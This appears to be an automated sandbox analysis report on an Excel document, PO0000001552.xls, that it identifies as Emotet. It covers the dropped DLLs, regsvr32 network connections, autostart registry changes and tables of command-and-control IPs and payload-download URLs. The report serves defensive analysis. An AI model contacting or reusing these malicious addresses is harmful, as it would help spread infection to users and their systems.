Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B064980 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FFD2B064980
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B0691F4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FFD2B0691F4

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 45.63.99.23 7080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 173.255.211.88 443 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 182.162.143.56 443 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\regsvr32.exe Code function: GetLastError,free,free,GetLocaleInfoW,GetLocaleInfoW,free,GetLocaleInfoW, 8_2_00007FFD2B072BF4
Source: C:\Windows\System32\regsvr32.exe Code function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW, 8_2_00007FFD2B077A88
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 8_2_00007FFD2B0779F8
Source: C:\Windows\System32\regsvr32.exe Code function: _getptd,GetLocaleInfoA, 8_2_00007FFD2B077910
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesA, 8_2_00007FFD2B077F60
Source: C:\Windows\System32\regsvr32.exe Code function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,GetLocaleInfoW,GetLocaleInfoW,GetACP,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s, 8_2_00007FFD2B077FCC
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 8_2_00007FFD2B0777EC
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesA, 8_2_00007FFD2B077E88
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesA, 8_2_00007FFD2B077EC8
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free, 8_2_00007FFD2B078470
Source: C:\Windows\System32\regsvr32.exe Code function: _getptd,GetLocaleInfoA,GetLocaleInfoW, 8_2_00007FFD2B077D58
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B068C48 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 8_2_00007FFD2B068C48
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B0675D0 HeapCreate,GetVersion,HeapSetInformation, 8_2_00007FFD2B0675D0

Stealing of Sensitive Information
barindex
Yara detected Emotet
Source: Yara match File source: 0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2414500170.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 745091 Sample: PO0000001552.xls Startdate: 13/11/2022 Architecture: WINDOWS Score: 100 39 129.232.188.93 xneeloZA South Africa 2->39 41 45.235.8.30 WIKINETTELECOMUNICACOESBR Brazil 2->41 43 49 other IPs or domains 2->43 57 Snort IDS alert for network traffic 2->57 59 Multi AV Scanner detection for domain / URL 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 8 other signatures 2->63 8 EXCEL.EXE 163 55 2->8         started        signatures3 process4 dnsIp5 51 copunupo.ac.zm 41.63.0.22, 443, 49701 ZAMRENZM Zambia 8->51 53 datie-tw.com 175.98.167.165, 443, 49697 TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvi Taiwan; Republic of China (ROC) 8->53 55 3 other IPs or domains 8->55 27 C:\Users\user\elv3.ooocccxxx, PE32+ 8->27 dropped 29 C:\Users\user\elv2.ooocccxxx, PE32+ 8->29 dropped 31 C:\Users\user\...vvmhfKiKFhKrSuHfBq[1].dll, PE32+ 8->31 dropped 33 o0oHPECmC0WPIXcvQP...OO7w00z7mkDO[1].dll, PE32+ 8->33 dropped 71 Document exploit detected (creates forbidden files) 8->71 73 Document exploit detected (UrlDownloadToFile) 8->73 13 regsvr32.exe 2 8->13         started        17 regsvr32.exe 2 8->17         started        19 regsvr32.exe 8->19         started        file6 signatures7 process8 file9 35 C:\Windows\System32\...\JZazaZgAOY.dll (copy), PE32+ 13->35 dropped 75 Hides that the sample has been downloaded from the Internet (zone.identifier) 13->75 21 regsvr32.exe 1 13->21         started        37 C:\Windows\...\FrugrCuQjdEr.dll (copy), PE32+ 17->37 dropped 25 regsvr32.exe 1 17->25         started        signatures10 process11 dnsIp12 45 173.255.211.88, 443, 49705, 49707 LINODE-APLinodeLLCUS United States 21->45 47 182.162.143.56, 443, 49712, 49713 LGDACOMLGDACOMCorporationKR Korea Republic of 21->47 49 45.63.99.23, 7080 AS-CHOOPAUS United States 21->49 65 Creates multiple autostart registry keys 21->65 67 Creates an autostart registry key pointing to binary in C:\Windows 21->67 69 System process connects to network (likely due to code injection or exploit) 25->69 signatures13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
110.232.117.186
 unknown Australia
56038 RACKCORP-APRackCorpAU true
103.132.242.26
 unknown India
45117 INPL-IN-APIshansNetworkIN true
104.168.155.143
 unknown United States
54290 HOSTWINDSUS true
79.137.35.198
 unknown France
16276 OVHFR true
45.118.115.99
 unknown Indonesia
131717 IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID true
172.104.251.154
 unknown United States
63949 LINODE-APLinodeLLCUS true
115.68.227.76
 unknown Korea Republic of
38700 SMILESERV-AS-KRSMILESERVKR true
81.68.152.197
 ly.yjlianyi.top China
45090 CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa false
163.44.196.120
 unknown Singapore
135161 GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG true
206.189.28.199
 unknown United States
14061 DIGITALOCEAN-ASNUS true
45.63.99.23
 unknown United States
20473 AS-CHOOPAUS true
107.170.39.149
 unknown United States
14061 DIGITALOCEAN-ASNUS true
197.242.150.244
 unknown South Africa
37611 AfrihostZA true
185.4.135.165
 unknown Greece
199246 TOPHOSTGR true
183.111.227.137
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR true
45.176.232.124
 unknown Colombia
267869 CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC true
139.59.56.73
 unknown Singapore
14061 DIGITALOCEAN-ASNUS true
169.57.156.166
 unknown United States
36351 SOFTLAYERUS true
175.98.167.165
 datie-tw.com Taiwan; Republic of China (ROC)
9924 TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvi false
164.68.99.3
 unknown Germany
51167 CONTABODE true
139.59.126.41
 unknown Singapore
14061 DIGITALOCEAN-ASNUS true
167.172.253.162
 unknown United States
14061 DIGITALOCEAN-ASNUS true
147.139.166.154
 unknown United States
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC true
202.129.205.3
 unknown Thailand
45328 NIPA-AS-THNIPATECHNOLOGYCOLTDTH true
167.172.199.165
 unknown United States
14061 DIGITALOCEAN-ASNUS true
153.92.5.27
 unknown Germany
47583 AS-HOSTINGERLT true
159.65.140.115
 unknown United States
14061 DIGITALOCEAN-ASNUS true
159.65.88.10
 unknown United States
14061 DIGITALOCEAN-ASNUS true
172.105.226.75
 unknown United States
63949 LINODE-APLinodeLLCUS true
164.90.222.65
 unknown United States
14061 DIGITALOCEAN-ASNUS true
213.239.212.5
 unknown Germany
24940 HETZNER-ASDE true
5.135.159.50
 unknown France
16276 OVHFR true
173.255.211.88
 unknown United States
63949 LINODE-APLinodeLLCUS true
212.24.98.99
 unknown Lithuania
62282 RACKRAYUABRakrejusLT true
186.194.240.217
 unknown Brazil
262733 NetceteraTelecomunicacoesLtdaBR true
91.187.140.35
 unknown Serbia
13092 UB-ASRS true
119.59.103.152
 unknown Thailand
56067 METRABYTE-TH453LadplacoutJorakhaebuaTH true
159.89.202.34
 unknown United States
14061 DIGITALOCEAN-ASNUS true
201.94.166.162
 unknown Brazil
28573 CLAROSABR true
160.16.142.56
 unknown Japan 9370 SAKURA-BSAKURAInternetIncJP true
103.75.201.2
 unknown Thailand
133496 CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH true
91.207.28.33
 unknown Kyrgyzstan
39819 PROHOSTKG true
103.43.75.120
 unknown Japan 20473 AS-CHOOPAUS true
188.44.20.25
 unknown Macedonia
57374 GIV-ASMK true
45.235.8.30
 unknown Brazil
267405 WIKINETTELECOMUNICACOESBR true
153.126.146.25
 unknown Japan 7684 SAKURA-ASAKURAInternetIncJP true
72.15.201.15
 unknown United States
13649 ASN-VINSUS true
82.223.21.224
 unknown Spain
8560 ONEANDONE-ASBrauerstrasse48DE true
173.212.193.249
 unknown Germany
51167 CONTABODE true
47.92.35.35
 sbm.xinmoshiwang.com China
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd false
95.217.221.146
 unknown Germany
24940 HETZNER-ASDE true
41.63.0.22
 copunupo.ac.zm Zambia
37532 ZAMRENZM false
149.56.131.28
 unknown Canada
16276 OVHFR true
209.97.163.214
 unknown United States
14061 DIGITALOCEAN-ASNUS true
182.162.143.56
 unknown Korea Republic of
3786 LGDACOMLGDACOMCorporationKR true
1.234.2.232
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true
129.232.188.93
 unknown South Africa
37153 xneeloZA true
94.23.45.86
 unknown France
16276 OVHFR true

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
sbm.xinmoshiwang.com 47.92.35.35 true
datie-tw.com 175.98.167.165 true
copunupo.ac.zm 41.63.0.22 true
ly.yjlianyi.top 81.68.152.197 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://ly.yjlianyi.top/wp-admin/4cChao/ false
  • Avira URL Cloud: malware
 unknown
https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/ true
  • Avira URL Cloud: malware
 unknown
http://sbm.xinmoshiwang.com/upload/VaOfWEb3pW76UO/ true
  • Avira URL Cloud: malware
 unknown
https://182.162.143.56/tkafmhcgcid/ true
  • Avira URL Cloud: malware
 unknown